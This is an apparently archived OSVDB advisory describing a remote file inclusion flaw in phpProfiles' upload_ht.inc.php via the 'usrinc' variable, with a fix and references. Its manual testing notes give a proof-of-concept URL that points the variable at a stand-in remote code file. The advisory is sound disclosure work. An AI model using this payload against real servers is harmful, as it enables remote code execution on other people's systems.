phpProfiles upload_ht.inc.php usrinc Variable Remote File Inclusion

2006-10-30T06:48:58
ID OSVDB:30138
Type osvdb
Reporter v1per-haCker(v1per-hacker@hotmail.com)
Modified 2006-10-30T06:48:58

Description

Vulnerability Description

phpProfiles contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to upload_ht.inc.php not properly sanitizing user input supplied to the 'usrinc' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 3.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

phpProfiles contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to upload_ht.inc.php not properly sanitizing user input supplied to the 'usrinc' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/path/users/include/upload_ht.inc.php?usrinc=http://EvElCoDe.txt?

References:

Vendor URL: http://linuxwebshop.com/scripts.php Secunia Advisory ID:22644 Related OSVDB ID: 30136 Related OSVDB ID: 30137 ISS X-Force ID: 29900 Generic Exploit URL: http://www.milw0rm.com/exploits/2688 FrSIRT Advisory: ADV-2006-4274 CVE-2006-5634 Bugtraq ID: 20819